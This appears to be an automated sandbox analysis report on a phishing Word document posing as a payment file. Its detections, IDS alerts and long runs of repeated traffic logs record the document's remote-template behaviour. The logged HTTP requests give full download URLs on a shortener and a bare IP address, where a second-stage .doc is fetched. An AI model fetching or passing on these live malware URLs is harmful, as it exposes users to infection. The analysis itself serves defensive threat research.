Edit tour

Windows Analysis Report
FFL-2025-00947 PAYMENT.docx.doc

Overview

General Information

Sample name:FFL-2025-00947 PAYMENT.docx.doc
Analysis ID:1668132
MD5:78a0ad27916c36ecee03aa248e3f419a
SHA1:742d6c84bb558d2a759a35af2588bf35d6f8bd13
SHA256:8ecb35498bed6edbe4bd53ce6d9cd46ef2bead452af5f407a6b65a5e0640591d
Tags:docdocxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w11x64_office
  • WINWORD.EXE (PID: 7056 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 60827, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7056, Protocol: tcp, SourceIp: 104.21.20.196, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-18T06:56:12.160852+020018100041Potentially Bad Traffic192.168.2.2460832104.21.20.196443TCP
2025-04-18T06:56:12.681332+020018100041Potentially Bad Traffic192.168.2.2460834203.202.232.17080TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-18T06:56:09.820739+020018100051Potentially Bad Traffic192.168.2.2460828104.21.20.196443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: FFL-2025-00947 PAYMENT.docx.docVirustotal: Detection: 23%Perma Link
Source: FFL-2025-00947 PAYMENT.docx.docReversingLabs: Detection: 33%
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.20.196:443 -> 192.168.2.24:60827 version: TLS 1.2
Source: global trafficDNS query: name: smol.re
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60827 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60827
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60828
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60828 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60829 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60829
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60830
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60830
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 104.21.20.196:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 104.21.20.196:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60830
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60830 -> 203.202.232.170:80
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60830
Source: global trafficTCP traffic: 203.202.232.170:80 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 203.202.232.170:80
Source: winword.exeMemory has grown: Private usage: 1MB later: 96MB

Networking

barindex
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60834 -> 203.202.232.170:80
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:60828 -> 104.21.20.196:443
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60832 -> 104.21.20.196:443
Source: Joe Sandbox ViewIP Address: 203.202.232.170 203.202.232.170
Source: Joe Sandbox ViewIP Address: 104.21.20.196 104.21.20.196
Source: Joe Sandbox ViewASN Name: ACCESSSMART-ASAccessSmartSolutionsIndiaPvtLtdIN ACCESSSMART-ASAccessSmartSolutionsIndiaPvtLtdIN
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /i1P8xb HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: smol.reConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownTCP traffic detected without corresponding DNS query: 203.202.232.170
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
